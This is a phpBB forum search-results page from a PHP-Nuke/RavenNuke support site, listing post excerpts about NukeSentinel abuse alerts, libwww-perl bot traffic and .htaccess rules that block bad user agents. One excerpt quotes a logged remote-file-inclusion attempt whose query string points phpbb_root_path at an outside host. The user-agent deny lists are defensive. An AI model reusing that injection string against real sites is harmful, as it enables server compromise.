Ravens PHP Scripts: Forums
 

 

Search found 113 matches
Author Message
 Topic: Question about this htaccess file with Raven Nuke
derek765

Replies: 5
Views: 21923

PostForum: Security Issues   Posted: Sat Nov 24, 2012 12:51 pm   Subject: Question about this htaccess file with Raven Nuke
This is a htaccess file which I have gathered from Joomla and am wondering If replacing my current htaccess file with this one will not mess anything up with me running Raven Nuke and Nuke Sent. with ...
 Topic: Why was this IP blocked?
azism

Replies: 8
Views: 16486

PostForum: v2.30.01 RN Security Issues   Posted: Fri Oct 29, 2010 11:47 am   Subject: re: Why was this IP blocked?
Montego,

Okay, I did find it, right after posting the previous message of course. I find nothing that I see listed in the "User Agent" part of the blocking message. The items listed in the Harveste ...
 Topic: A new attack target - GCalendar.
webservant

Replies: 3
Views: 6495

PostForum: NukeSentinel(tm) v2.6.x   Posted: Mon Jun 21, 2010 6:58 am   Subject: A new attack target - GCalendar.
I haven't seen GCalendar targeted before. So, I figure that I'd share it with the community.

Created By: NukeSentinel(tm) 2.6.03
Date & Time: 2010-06-21 00:20:00 E ...
 Topic: GCalendar security exploit
Susann

Replies: 4
Views: 9501

PostForum: Security - Other   Posted: Mon May 31, 2010 6:04 am   Subject: GCalendar security exploit
I´m getting dozen of blocked e-mails daily from NukeSentinel.
So I `ll chance this behavior but I checked also my logs and found out there is an security issue with this calendar in Joomla.

GET ...
 Topic: To understand better what is Abuse-Harvest libwww-perl?
blith

Replies: 1
Views: 4931

PostForum: Security Issues   Posted: Wed May 05, 2010 9:49 am   Subject: To understand better what is Abuse-Harvest libwww-perl?
Hi, I am getting the blocked abuse:

Reason: Abuse-Harvest
String Match: libwww-perl

from a myriad of IPs. What exactly is libwww-perl? Thanks!
 Topic: Possible Harvester block?
azism

Replies: 6
Views: 12163

PostForum: NukeSentinel(tm)   Posted: Sun Jan 03, 2010 11:56 am   Subject: re: Possible Harvester block?
Oh yah... forgot about that. Confused Told you it had been a long time since I did anything with any of those settings as the Sentinal system has been working so well.

Anyway, I see nothing here. My li ...
 Topic: My site was hacked
sebastiaan

Replies: 76
Views: 117811

PostForum: Security Issues   Posted: Sat Jul 18, 2009 5:53 pm   Subject: re: My site was hacked
I've had my site hacked, parts of the forum deleted and then several modules deactivated.

Created By: NukeSentinel(tm) 2.6.01
Date & Time: 2009-02-17 10:36:02 UTC GMT +0000
Blocked IP: 2 ...
 Topic: Get blank screen when I click on sentinel admin icon
rogue3

Replies: 12
Views: 16363

PostForum: NukeSentinel(tm) v2.6.x   Posted: Sun Jul 12, 2009 6:05 am   Subject: re: Get blank screen when I click on sentinel admin icon
No problem.

Since I've gotten it up and running, I frequently get abuse emails such as this one:

Created By: NukeSentinel(tm) 2.6.01
Date & Time: 2009-07-11 03:27:08 MST GMT -0700
Bloc ...
 Topic: Cannot access forum admin
Doulos

Replies: 7
Views: 14494

PostForum: v2.3 RN Issues   Posted: Mon May 11, 2009 10:25 am   Subject: Cannot access forum admin
I am getting an error when I try to access the forum admin area (all other admin functions work perfectly). When I click the forum admin button I get this:ERROR: 500 - Internal Server Error

Intern ...
 Topic: Mobile Phone access
horrorcode

Replies: 16
Views: 27011

PostForum: Security - PHP Nuke   Posted: Fri Apr 17, 2009 5:51 pm   Subject: Mobile Phone access
I have a question along these lines. This is the user agent:
Mozilla/3.0 (compatible; WebCapture 2.0; Auto; Windows)

Is Mozilla/3.0 really a known harvester? I would assume it has to be correct bu ...
 Topic: My site was hacked
cornishpixie

Replies: 76
Views: 117811

PostForum: Security Issues   Posted: Tue Feb 17, 2009 6:51 pm   Subject: My site was hacked
I've had my site hacked, parts of the forum deleted and then several modules deactivated.

Created By: NukeSentinel(tm) 2.6.01
Date & Time: 2009-02-17 10:36:02 UTC GMT +0000
Blocked IP: 2 ...
 Topic: NukeSentinel not adding banning IP's to .htaccess
StalkS

Replies: 16
Views: 27892

PostForum: NukeSentinel(tm) v2.6.x   Posted: Tue Feb 03, 2009 4:38 am   Subject: NukeSentinel not adding banning IP's to .htaccess
I updated my site to the latest RavenNuke (v2.30.00 ) around three months ago and I have to say I am extremely pleased with the results. I have polished, professional looking/ functioning website. A ...
 Topic: NukeSentinel Mail
zeromechanic

Replies: 11
Views: 17120

PostForum: v2.3 RN Issues   Posted: Tue Nov 11, 2008 3:06 pm   Subject: NukeSentinel Mail
I was wondering if something has changed in the mailing routine of NukeSentinel.

Since I installed RN2.30 i'm receiving mail deliveryfailures at my admin mail.
The mails are not send to my abuse m ...
 Topic: phphost_directoryv2
evaders99

Replies: 5
Views: 8107

PostForum: Security - PHP Nuke   Posted: Tue Aug 19, 2008 7:03 pm   Subject: phphost_directoryv2
Or hacked servers by this botnet
You should use NukeSentinel or .htaccess rules to block libwww-perl
 Topic: Sentinel + redirect user agent
testy1

Replies: 3
Views: 7705

PostForum: NukeSentinel(tm) v2.6.x   Posted: Sun Aug 17, 2008 9:55 pm   Subject: Sentinel + redirect user agent
im just wondering if it is worth thinking about incorporating the perl user agent into sentinel for imediate banning or redirection?

e.g.


libwww-perl/5.810


are there any legitimate uses f ...
 Topic: phphost_directoryv2
Unit1

Replies: 5
Views: 8107

PostForum: Security - PHP Nuke   Posted: Sat Aug 16, 2008 7:38 pm   Subject: phphost_directoryv2
Can some one let me know what they are trying to do ? I am seeing a lot of this on my site
85.12.15.28 - -

Thanks for any info
 Topic: huge bot attack - site suspend
prekill

Replies: 31
Views: 56771

PostForum: Security - PHP Nuke   Posted: Fri Aug 08, 2008 1:36 pm   Subject: huge bot attack - site suspend
this is what I got:

is this ok?


RewriteEngine on

#The next lines check for Email Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^Java [NC,OR ...
 Topic: Geting a TON of Blocked Abuse
evaders99

Replies: 1
Views: 6565

PostForum: RN NukeSentinel(tm) issues   Posted: Mon Jun 30, 2008 10:35 pm   Subject: Geting a TON of Blocked Abuse
These are all automated attempts. Basically they try any exploits, whether you are using a specific software/script/module or not.

Block libwww-perl, that will solve probably 80-90% of these. Ther ...
 Topic: Geting a TON of Blocked Abuse
daverupe

Replies: 1
Views: 6565

PostForum: RN NukeSentinel(tm) issues   Posted: Mon Jun 30, 2008 9:59 pm   Subject: Geting a TON of Blocked Abuse
I'm getting about 10-20 Blocked Abuse emails a day for months now... Is something wrong? Also sometimes the remote address is my IP address (external). I am aware of a posted security vulnerability in ...
 Topic: Website with changing IP attacking
Susann

Replies: 7
Views: 9388

PostForum: Security - Other   Posted: Tue Jun 03, 2008 9:14 am   Subject: re: Website with changing IP attacking
These attacks are nothing special and doesn´t work. Search for libwww-perl
and maybe try this in your .htaccess



RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/
 Topic: Tried to hack through my forums??
gazj

Replies: 23
Views: 46778

PostForum: Hack Attempt Script   Posted: Mon Apr 14, 2008 10:41 pm   Subject: re: Tried to hack through my forums??
there are alot of ways to block these but the most easy way is

im not sure if the useragent uses all these but i got some in my sentinel block list for 5.803, 5.805, 5.808 the other numbers i just ...
 Topic: Tried to hack through my forums??
evaders99

Replies: 23
Views: 46778

PostForum: Hack Attempt Script   Posted: Wed Feb 27, 2008 12:11 am   Subject: Tried to hack through my forums??
Yes. These are known issues that have been previously fixed.

One thing I would do is block libwww-perl, there are many posts on how to do this.
 Topic: Tried to hack through my forums??
oneunit

Replies: 23
Views: 46778

PostForum: Hack Attempt Script   Posted: Tue Feb 26, 2008 11:24 pm   Subject: Tried to hack through my forums??
User Agent: libwww-perl/5.65
Query String: www.1unit.org//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://wiki.sertes.nl/tiki/styles/slides/check.txt?
Get String: www.1unit.org//m ...
 Topic: Redirecting an annoyance.
fondy

Replies: 18
Views: 22856

PostForum: Security - Other   Posted: Thu Feb 21, 2008 4:16 am   Subject: re: Redirecting an annoyance.
If ModRewrite is not available, use this:

SetEnvIfNoCase user-agent "^Java" bad_bot
SetEnvIfNoCase user-agent "^LWP" bad_bot
SetEnvIfNoCase user-agent "^lwp-trivial" ...
 Topic: Redirecting an annoyance.
fondy

Replies: 18
Views: 22856

PostForum: Security - Other   Posted: Tue Feb 19, 2008 2:30 am   Subject: re: Redirecting an annoyance.
Hi

Instead of using rewrite to block, can this be an idea to include in htaccess :

SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot
SetEnvIfNoCase User-Agent "^Baiduspider" ...
 

 Jump to:   

Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©